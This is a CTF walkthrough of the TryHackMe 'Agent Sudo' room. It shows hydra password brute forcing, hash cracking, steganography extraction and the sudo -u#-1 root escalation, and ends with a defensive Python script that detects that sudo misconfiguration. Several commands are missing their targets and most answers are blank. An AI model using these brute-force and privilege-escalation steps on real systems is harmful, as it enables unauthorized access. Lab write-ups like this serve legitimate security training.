TryHackMe Agent Sudo CTF Room Walkthrough

  • Target Machine IP: 10.224.129/


nmap scan: nmap -sV -sC -Pn -oN scan.txt

  • Q. How many open ports?


    From Nmap scan

  • Q. How you redirect yourself to a secret page?


    visit Website

  • Q. What is the agent name?


    Change the User-Agent header from the browser default (Mozilla/Chrome) to C to access the website's contents

Hash Cracking and Bruteforce

  • Using hydra:

    hydra -l chris -P /usr/share/wordlists/rockyou.txt

    FTP login details chris:crystal

  • Q. FTP password

  • Now, access FTP service and download files from the FTP server with username chris and password crystal.

    # Enter username and password when prompted
    ftp> dir
    200 PORT command successful. Consider using PASV.
    150 Here comes the directory listing.
    -rw-r--r--    1 0        0             217 Oct 29  2019 To_agentJ.txt
    -rw-r--r--    1 0        0           33143 Oct 29  2019 cute-alien.jpg
    -rw-r--r--    1 0        0           34842 Oct 29  2019 cutie.png
    226 Directory send OK.
    # now download the files
    ftp> mget *
  • After downloading the files, cat To_agentJ.txt tells us that the password is hidden in one of the images:

    Dear agent J,
    All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
    Agent C
  • We use binwalk to get information stored in the files

    $ binwalk -e cute-alien.jpg
    0             0x0             JPEG image data, JFIF standard 1.01
    # cute-alien.jpg does not contain hidden password
    $ binwalk -e cutie.png
    0             0x0             PNG image, 528 x 528, 8-bit colormap, non-interlaced
    869           0x365           Zlib compressed data, best compression
    34562         0x8702          Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
    34820         0x8804          End of Zip archive, footer length: 22
    # hence, cutie.png contains hidden information in a zip archive; binwalk extracts these files into the folder _cutie.png.extracted
  • We can use the zip2john tool to convert the zip into a hash format that John the Ripper can crack

    zip2john > ziphash.txt
  • Use john to crack the hash

    john ziphash.txt

    password: alien

  • Q. Zip file password

  • Use the password to unzip the archive and read the To_agentR.txt file

    Agent C,
    We need to send the picture to 'QXJlYTUx' as soon as possible!
    Agent R

    QXJlYTUx is base64 encoded; we can use CyberChef to decode the string
    decoded string: Area51, which seems to be the steg password for the cute-alien.jpg image

  • Q. steg password

  • Extract Message from cute-alien.jpg using

    steghide extract -sf cute-alien.jpg
    # Enter Area51 as password

    Data will be extracted and saved in message.txt file

  • Read message.txt file

    cat message.txt


    Hi james,
    Glad you find this message. Your login password is hackerrules!
    Don't ask me why the password look cheesy, ask agent R who set this password for you.
    Your buddy,
  • Q. Who is the other agent (in full name)?

  • Q. SSH password


Capture The User Flag

  • Login to james account using SSH

  • The user flag is located in james's home directory

    james@agent-sudo:~$ cat user_flag.txt
  • Q. What is the user flag?

  • Copy Alien_autospy.jpg photo to attacker’s machine

    scp james@<target-ip>:~/Alien_autospy.jpg .
  • Uploading the image to Google Image Search gives various results, but the hint says we need the result from Fox News; this leads us to a Fox News page whose headline gives us the answer

  • Q. What is the incident of the photo called?

    Roswell alien autopsy

Privilege Escalation

  • Finding SUIDs

    find / -perm -u=s -type f 2>/dev/null

    From the output of the above command, we see that we are able to run the sudo command

  • Listing commands available to user james to use with sudo

    james@agent-sudo:~$ sudo -l
    [sudo] password for james:
    Matching Defaults entries for james on agent-sudo:
        env_reset, mail_badpass,
    User james may run the following commands on agent-sudo:
        (ALL, !root) /bin/bash

    Searching for (ALL, !root) /bin/bash in a search engine leads to an Exploit-DB entry

  • Q. CVE number for the escalation

  • Using the command given in the exploit program's comments, we get a bash shell as root

    james@agent-sudo:~$ sudo -u#-1 /bin/bash
    root@agent-sudo:~#
  • Root flags are usually located in /root/; navigating there and reading the file, we get

    root@agent-sudo:/root# cat root.txt
    To Mr.hacker,
    Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
    Your flag is
    DesKel a.k.a Agent R
  • Q. What is the root flag?

  • Q. (Bonus) Who is Agent R?
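
The `(ALL, !root)` Runas rule from the `sudo -l` output and the `sudo -u#-1` invocation above can both be looked for from the defender's side. The following Python is an added example, not part of the original walkthrough: it flags sudoers rules that exclude root only by negation and sudo log entries requesting uid -1 or 4294967295. The function names are hypothetical and the sudoers and log samples are constructed.

```python
import re

# Runas list of a sudoers rule: "user host = (runas_users : runas_groups) cmd"
RUNAS_RE = re.compile(r"=\s*\(([^)]*)\)")
# Target-user field sudo writes to its log when a numeric uid is requested
LOG_UID_RE = re.compile(r"\bUSER=#(-?\d+)")
# uid values that a vulnerable sudo resolves to 0 (root)
WRAPPED_UIDS = {-1, 4294967295}

# Constructed sample input (not taken from the target machine)
SAMPLE_SUDOERS = """\
# constructed sudoers fragment
root    ALL=(ALL:ALL) ALL
james   ALL=(ALL, !root) /bin/bash
backup  ALL=(backup) /usr/bin/rsync
"""
SAMPLE_LOG = """\
Oct 29 10:01:02 agent-sudo sudo: james : TTY=pts/0 ; PWD=/home/james ; USER=#-1 ; COMMAND=/bin/bash
Oct 29 10:05:40 agent-sudo sudo: james : TTY=pts/0 ; PWD=/home/james ; USER=#1000 ; COMMAND=/bin/bash
Oct 29 10:07:13 agent-sudo sudo: james : TTY=pts/0 ; PWD=/home/james ; USER=#4294967295 ; COMMAND=/bin/bash
"""

def risky_runas(sudoers_text):
    """Return (line_no, rule) for rules whose Runas list is ALL minus root."""
    hits = []
    for no, raw in enumerate(sudoers_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # skip blanks and comment lines
        for runas in RUNAS_RE.findall(line):
            users = [u.strip() for u in runas.split(":", 1)[0].split(",")]
            if "ALL" in users and any(u in ("!root", "!#0") for u in users):
                hits.append((no, line))
                break
    return hits

def suspicious_sudo_events(log_text):
    """Return log lines where sudo was asked to run as uid -1 or 4294967295."""
    return [l for l in log_text.splitlines()
            if (m := LOG_UID_RE.search(l)) and int(m.group(1)) in WRAPPED_UIDS]

if __name__ == "__main__":
    for no, rule in risky_runas(SAMPLE_SUDOERS):
        print(f"sudoers line {no}: Runas excludes root by name only: {rule}")
    for event in suspicious_sudo_events(SAMPLE_LOG):
        print(f"log: {event}")
```

Rules it flags are candidates for rewriting as an explicit list of permitted target users, alongside updating sudo as the root flag message advises.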